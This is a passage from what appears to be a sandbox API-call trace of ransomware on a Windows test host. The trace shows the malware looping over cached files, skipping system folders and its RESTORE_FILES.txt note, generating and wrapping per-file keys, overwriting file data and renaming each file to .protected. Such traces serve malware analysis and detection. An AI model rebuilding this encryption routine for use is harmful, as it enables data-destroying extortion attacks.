halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.434] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".txt") returned 0x0 [0088.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.434] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", 
lpSrch=".rar") returned 0x0 [0088.434] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.434] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".zip") returned 0x0 [0088.434] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.435] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.435] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.435] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.435] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.435] CloseHandle (hObject=0x150) returned 1 [0088.435] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected") returned 161 [0088.435] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.protected")) returned 1 [0088.447] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Windows") returned -1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files") returned -1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="Program Files (x86)") returned -1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="$Recycle.bin") returned 1 [0088.447] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="System Volume Information") returned -1 [0088.447] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.447] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".protected") returned 0x0 [0088.447] lstrcmpW 
(lpString1="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpString2="RESTORE_FILES.txt") returned -1 [0088.447] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.447] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.448] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.449] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".txt") returned 0x0 [0088.449] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.449] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".rar") returned 0x0 [0088.449] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0088.449] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".zip") returned 0x0 [0088.449] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.449] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.450] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.450] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.450] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.450] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.450] CloseHandle (hObject=0x150) returned 1 [0088.450] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected") returned 161 [0088.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.protected")) returned 1 [0088.458] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Windows") returned -1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files") returned -1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="Program Files (x86)") returned -1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="$Recycle.bin") returned 1 [0088.458] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="System Volume Information") returned -1 [0088.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.458] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".protected") returned 0x0 [0088.458] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpString2="RESTORE_FILES.txt") returned -1 [0088.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.462] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".txt") returned 0x0 [0088.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.462] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".rar") returned 0x0 [0088.462] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0088.462] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".zip") returned 0x0 [0088.462] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.463] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.463] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.463] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.463] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.463] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.463] CloseHandle (hObject=0x150) returned 1 [0088.463] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected") returned 161 [0088.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.protected")) returned 1 [0088.491] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Windows") returned -1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files") returned -1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="Program Files (x86)") returned -1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="$Recycle.bin") returned 1 [0088.491] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="System Volume Information") returned -1 [0088.491] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.491] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".protected") returned 0x0 [0088.491] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpString2="RESTORE_FILES.txt") returned -1 [0088.491] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.491] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.493] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".txt") returned 0x0 [0088.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.493] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".rar") returned 0x0 [0088.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0088.493] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".zip") returned 0x0 [0088.493] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.494] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.494] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.494] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.494] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.494] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.495] CloseHandle (hObject=0x150) returned 1 [0088.495] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected") returned 161 [0088.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.protected")) returned 1 [0088.496] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Windows") returned -1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files") returned -1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", 
lpString2="Program Files (x86)") returned -1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="$Recycle.bin") returned 1 [0088.496] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="System Volume Information") returned -1 [0088.496] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.496] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".protected") returned 0x0 [0088.496] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="RESTORE_FILES.txt") returned -1 [0088.496] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.497] StrStrW 
(lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".txt") returned 0x0 [0088.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.497] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".rar") returned 0x0 [0088.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0088.497] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".zip") returned 0x0 [0088.497] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 